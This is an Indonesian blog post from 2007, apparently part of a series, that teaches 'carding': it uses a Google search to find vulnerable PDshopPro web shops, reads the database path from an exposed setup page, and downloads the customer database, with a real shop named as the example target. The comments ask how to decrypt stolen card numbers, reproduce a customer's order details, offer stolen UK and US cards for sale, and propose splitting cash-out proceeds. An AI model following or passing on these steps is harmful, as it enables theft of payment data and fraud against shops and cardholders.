Tutorial Carding (bagian III)

 Senin 28 Mei 2007

artikel ini sebagai lanjutan dari seri Tutorial Carding selanjutnya sebagai panduan untuk para newbie yang ingin belajar dan terus berusaha memajukan bangsa hehehe GBU🙂

Tutorial Carding (Bagian III)

    

  

————————————–

Tutorial ini spyro dapatkan dari suatu ftp seorang korban saat sedang mendeface webnya (lihat posting berjudul “Mengapa aku mendeface profil FS dan website Fun2Holic” (19 september 2006) di halaman Cerita Hari iNi.

————————————–

 

1. Cari target dahulu Website PDshopro di google.com, dengan keyword allinurl:/shop/category.asp/catid=
2. Kita lihat dulu konfirgurasi databasenya dg mengganti urlnya menjadi : http://www.contoh.com/admin/dbsetup.asp
3. Contoh target : http://www.marktwainbooks.com/admin/dbsetup.asp
4. Kita akan mendapatkan output kira² dg keterangan sbb:
5. Nah, dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
6. Sekarang, untuk mendownload file sdatapdshoppro.mdb dapat dilakukan dg merubah urlnya menjadi:
7. http://www.marktwainbooks.com/data/pdshoppro.mdb
8. Untuk membuka file .mdb-nya dengan menggunakan program Microsoft Access

About sugoistanley

Me is just another ordinary boy in this world....Iam not a hacker but i believe someday I Will...

Posted on May 28, 2007, in Hacking. Bookmark the permalink. 46 Comments.

  1. no cc nya kok begini -> }[.è»^ÄΕNϼ’Ñm¬ ???
    Apa artinya? Apa kena encrypt tu?

  2. ya nih mas kok gitu sih ccnya, g paham apa di encrip apa giman, tlg dong di jelaskan,klo di encrip gmn dong bukaknya

  3. bukan di encrypt,tapi itu format data yang di pake oleh admin web nya. bener untuk yang non secure kaya’ nama,e-mail,dll bisa dibaca dengan baek di microsoft acess. tapi untuk pass n no cc ga bisa,jadi microsoft acess nampilin informasi seadanya. coba deh,mungkin adminnya teledor naruh encrypt generator di directory data.. cari aja brangkali ketemu.. hehe… ga mungkin ya??

  4. kalo lacak dbase-nya itu mah gampang……
    gmn kalo kita ngehack foldernya….
    kaya gini yg gw hack….
    http://php.schaueriksen.com/modules/Shopping_Cart/?M=A

    or main direktory…

    http://php.schaueriksen.com/modules/
    klo lo bisa buka berarti lu udah sukses ky gw…

  5. makasih mas andhyst!!!

  6. lha kalo file mdb-nya di password, bukanya gimana????

  7. lha itu dia buka passwordnya…??

  8. mBah SekaLian Posting donk tutor carding yang keren bermodel kan mdb. Ditunggu Kedatangan na Segera

    SeLoPs aka Andica Irawan

  9. saya mo bagi ke teman2 carding hasil hack saya.
    card number : vcc 396
    master card
    valid : 28 juny 2008

    jangan lupa kirim jg buat saya ya…

  10. saya ada target yg pake
    Database Setup / Maintenance
    (revision v4.014)

    Your Database Type:
    Microsoft Access
    Current Status:
    Connection to Database OK.
    Database Primary ‘setup’ Table Found!
    Database permissions OK!

    NOTE: If the database “Type” or “Connection String” above is incorrect, you need to edit the setup.asp file located in the includes directory of your PDshopPro web.

    —–but the tutorial that i search on google only show for this version

    Database Setup / Maintenance
    (Updated 11-3-03 v3.0)

    Your Database Type:
    Microsoft Access
    Your Connection String:
    Driver={Microsoft Access Driver (*.mdb)}; DBQ=d:\inetpub\marktwainbook
    s\data\pdshoppro.mdb;
    Current Status:
    Connection to Database OK.
    Database Primary ‘setup’ Table Found!
    Database permissions OK!

    NOTE: If the database “Type” or “Connection String” above is incorrect, you need to edit the setup.asp file located in the includes directory of your PDshopPro web.

    tolong dong diberi pencerahan
    thanks

  11. cara encrypte pd shop pro d mana boss…

    bingung nih mau terjemahin pass naa😦

  12. Gue ada url link dpt dari search engine.
    http://yogyacarding.tvheaven.com

  13. untu decrypt pdshoppro mending pake rc4 bro… biar cc nya tahu🙂
    thx…
    47584512 hasil dari
    Lez on June 11th, 2007

    no cc nya kok begini -> }[.è»^ÄΕNϼ’Ñm¬ ???
    Apa artinya? Apa kena encrypt tu?

  14. minta password bos, wkt mo uka mdbnya? kena admin pasword nich? minta yg bs bbknya donk?

  15. rastaman_live_up

    cara encrypte pd shop pro d mana&gmn?? boss…please donk kasih tau….

  16. sebenarnya trik2 seperti itu udach di bahas pada tahun yg lalu, dan ujung2nya para hacker ngga mau ngasih tau caranya,,,,tapi sampai sekarang saya masih bisa beli2 domain dan call with yahoo,,,he….he…he… nich contohnya —>>>http://mr-file.com akan di alihkan ke —>>>http://ur13zuhry.blogspot.com

  17. thanks bgt bro…
    ini tutorial yg aku cari2,,, tp masih awam bgt neh..
    ntar aku minta bantuannya yah klo ga ngerti…. hehhehe…….
    salam knal buat mas sugoistanley n smuanya…:-)

  18. Database Setup / Maintenance
    (Updated 11-3-03 v3.0)

    Your Database Type:
    Microsoft Access
    Your Connection String:
    Driver={Microsoft Access Driver (*.mdb)}; DBQ=d:\inetpub\marktwainbook
    s\data\pdshoppro.mdb;
    Current Status:
    Connection to Database OK.
    Database Primary ‘setup’ Table Found!
    Database permissions OK!

    NOTE: If the database “Type” or “Connection String” above is incorrect, you need to edit the setup.asp file located in the includes directory of your PDshopPro web.

    Database Procedures
    (Use caution and backup your database first!)

    Formatting Database… Please Wait!

    ——————————————————————————–

    Format Database:
    This procedure will recreate all required tables and fields for the most recent version of PDshopPro (see above “updated date”). It will attempt to add any field or table that is not present in your database and it will modify any existing field and table definitions to match the current structure. To change the database type, you must edit the “setup.asp” file in the includes directory.

    WE DO NOT RECOMMEND RUNNING THIS PROCEDURE UNLESS YOU JUST RECEIVED AN UPDATE/ENHANCEMENT FROM PAGEDOWN TECH. THAT REQUIRES THIS PROCEDURE. ALSO, IF YOU HAVE MADE YOUR OWN CHANGES TO THE DATABASE STRUCTURE DO NOT RUN THIS PROCEDURE AS IT MAY UNDO YOUR CHANGES.

    If you setup any users in PDAdmin, you may be required to enter an Admin username and password below:

    Username:

    Password:

    ——————————————————————————–

    Upgrading Data… Please Wait!

    Upgrade Database Data:
    This procedure will transform some of your existing PDshopPro data to work with the PDshopPro “Plus” edition. This procedure will convert your existing categories and item options as well as other system fields.

    WE DO NOT RECOMMEND RUNNING THIS PROCEDURE UNLESS YOU JUST RECEIVED AN UPDATE/ENHANCEMENT FROM PAGEDOWN TECH. THAT REQUIRES THIS PROCEDURE. ALSO, IF YOU HAVE MADE YOUR OWN CHANGES TO THE DATABASE STRUCTURE DO NOT RUN THIS PROCEDURE AS IT MAY NOT WORK AS EXPECTED!

    If you setup any users in PDAdmin, you may be required to enter an Admin username and password below:

    Username:

    Password:

    ——————————————————————————–

    Importing Data… Please Wait!

    Import Default State/Country Data:
    This procedure will import the default country and state lists. PDshopPro PLUS EDITION no longer uses the State or Country “include” files. This data is now stored in the database and may need to be imported.

    THIS PROCEDURE WILL DELETE ALL EXISTING STATES AND COUNTRIES IN YOUR DATABASE.

    If you setup any users in PDAdmin, you may be required to enter an Admin username and password below:

    Username:

    Password:

    ——————————————————————————–

    Setup Support / Knowledgebase
    (Common setup problems)

    Visit our support site to troubleshoot common error messages, etc.
    Or, view the help file:

    Help File
    Support Site

    By Downloading or using this software, you agree to the terms and conditions as stated in the Software License Agreement. An updated copy of this agreement can be seen at http://www.pagedowntech.com/terms.

    PageDown Technology, LLC., Copyright 2003

    trus gmn ne kelanjutannya? jd bingung

  19. wakakaka……wah trik jaman gq smp masih dipake ternyata….saluts!!!!

  20. Buat Pengasuh blok ini:

    Kak, gmn caranya decrypt nmr cc ato password customer? Kaka bisa jawab di blog ini ato langsung ke e-mail ku aja.

    Sebenarnya tutor kaya’ gini dah banyak yg nyebar, tp ga da yg ngasih decryptornya. Ga tau kali yah?

  21. Walah tutorial jadul emang masih bisa ya ?

  22. woro…woro……! passwordnya pakae bahasa apaan sih kok gw gak nerti sih….! apa ada program khusus buat ngelihat password ini ??? tank yah mas…….! gue penasaran bos ada yang bisa ngasih obat penasaran gue gak?

  23. keluar kaya gini bosss :

    Server Error in ‘/’ Application.
    Runtime Error
    Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.

    Details: To enable the details of this specific error message to be viewable on remote machines, please create a tag within a “web.config” configuration file located in the root directory of the current web application. This tag should then have its “mode” attribute set to “Off”.

    Notes: The current error page you are seeing can be replaced by a custom error page by modifying the “defaultRedirect” attribute of the application’s configuration tag to point to a custom error page URL.

    apa solusinya ????????

  24. mat sore..
    oh ya saya mau nanya..
    sya da mencoba cara gt da cukup lama..
    tapi saya mau nanya untuk decrypct na make software apa??
    RC4 (seri yg mana )

    klo ada waktu mohon di balaz ya..
    melalui forum ini atw email saya juga bisa…

    Makasi banyak…
    saya tunggu

  25. Heehhehehe. Encyrpt-encrypt an yah. Ngapain juga encrypt kalo udah punya Database yang super komplit. Full info sampai dengan tanggal lahir sampai dengan ssn juga email dan passnya dan juga ada ip ny juga. Apalagi tokonya up to date. setiap hari ada transaksinya. Yaaah aku liat sih setiap hari minimal 27 transaksi. Hehehehehe. Lumayan lah sudah datengin Asus Lamborghini VX2 dan berlian.
    Kayaknya aku dapet database itu seperti mendapatkan surga dunia. Tinggal klik dan langsung dapat tracking number dan scan receiptnya.
    Heheheheh.

  26. hi..mua

    9w newbie nhe ,,,
    9w ngin bgt jd carder tp g bisa”,,,

    leh mnta no CC g,,?? satuuu aja
    9w ngin bgt bs lanjutin kull tp ortu 9w g punya duit..
    jd tolong donk bantuin 9w ksh no CC satuuu aja y

    kirim ke email 9w Ljunot@yahoo.co.id
    atw d forum ni jg gpp…

    makasih bgt untuk semuanya
    moga dibalas ma Allah SWT (amiin)

  27. hehe Junot….
    jaman sekarang nih mana ada yang namanya mintak2
    usaha dunk ndiri…
    ntar keterusan minta2 mau lo??

  28. Database Setup / Maintenance
    (Updated 11-3-03 v3.0)

    Your Database Type:
    Microsoft Access
    Your Connection String:
    Driver={Microsoft Access Driver (*.mdb)}; DBQ=d:\inetpub\marktwainbook
    s\data\pdshoppro.mdb;
    Current Status:
    Connection to Database OK.
    Database Primary ’setup’ Table Found!
    Database permissions OK!

    ================================
    ini maksudnya
    database lokasinya ada di :
    DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;

    jadi sekarang utk mendownload file pdshoppro.mdb dapat dilakukan dgn merubah
    url/browsing nya menjadi :

    http://www.marktwainbooks.com/data/pdshoppro.mdb

    Kalo sudah di download, buka file pdshoppro.mdb dgn Microsoft Access.
    OK!!!

    tapi lebih baik jika anda mencari cc dengan cara 123 shop cart.

    Bye

  29. waahhh yang lain dong… pdshoppro kan dah bapuk…
    tp masih gress kah?? let see…heheh untung masih ada nih..sinterklaz RC4 nya hihihii

  30. New Order
    Order# : 100201 Date : 2/11/2008 11:54:57 AM
    Billing Information Shipping Information
    Name : phiphi Ship to : phiphi
    E-mail : phiroz@gmail.com Ship Method : UPS Ground
    Billing Address : 4158 w post rd
    vegas
    NV, 89119 Ship Address : 4158 w post rd
    vegas
    NV, 89119
    Tel : 702-123-4567 Tel : 702-123-4567
    Fax : Fax :
    Card Type : Visa
    Card# : ************5499
    Exp.Date : 10/09
    Secure# : ***

  31. Igor_cavalera

    klo klen mo cc…add aja di Ym kamu cavalera_phoneshop@yahoo.com…ntar gw kasih daaaahhh…
    gw banyak tu cc UK & USA…
    gw da test di CCbot
    ama wallet…mantrap smua..

  32. masih newbee neh mau tanya aplikasi sinterklazdecrypt gmn seh bro.. thanks banget yang udah mau jawab .. dikasih aplikasi yang baru juga nda pp kirim ke email ku ya .. kenzachan84@gmail.com

    thanks banget yang udah mau jawab …

  33. ga usah maen carding lg…
    da basi..
    mendingan scamer aja///
    ntar gw ajarin deh..
    add aja di YM lo cavalera_phoneshop@yahoo.com

  34. gw ada data2 CC, kalo cara mbobol nya tuk di tukarkan uang atau beli gimana ya biar aman.

    kalo ada yg mau kerja sama.
    aku yg ngasih data CC nya , situ yg ngerjain. di bagi 50-50 gimana ?

    ada yg mau ?

  35. mendingan berenti ajah cari – cari database … ntar bisa – bisa malah rambut semakain hari semakin BotaK!!!

    beli ajah nama sich Bro …

  36. ku udah dapat data mdp nya tapi waktu kubuka ko filenya ga ada? can u help me? viva carder

  37. CC..?? kayaknya dah basi deh kalau bicara soal cc ama decrypt pdshoppro itu kan dah tutorial lama bgt.
    😀

  38. ajarin gw cara jadi carding dunk tmen2,,,
    gw masih newbie bngt ne….plisssss

  39. mas…mnat cc nya dunk

  40. klo lu pade butuh cc…minta aja ke gw…
    syaratnya cuman atu….
    isi aja pulsa gw…seberapa lo mampu…okeh…
    add YM gw…cavalera_phoneshop@yahoo.com

  41. lu mw cc?
    account member premium?
    account bokep?
    software?
    beli domain?
    etc.(selagi masih bisa gw usahain)
    add YM gw cavalera_phoneshop@yahoo.com

  42. bro, gw lgi coba2 dumping site pke sqli,yg gw tnya,gmn bro decryp pswd yg encryp’an? gw coba di web md5 online gag pernah bisa dpet,ada software/aplikasinya?gw udh add ym ente bro

  43. semua caranya ada di http://www.malaikat.info berbagai teknik hack ada disitu

  44. Gmna Mas, buat apa database itu?
    Fungsinya buat kita apa?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s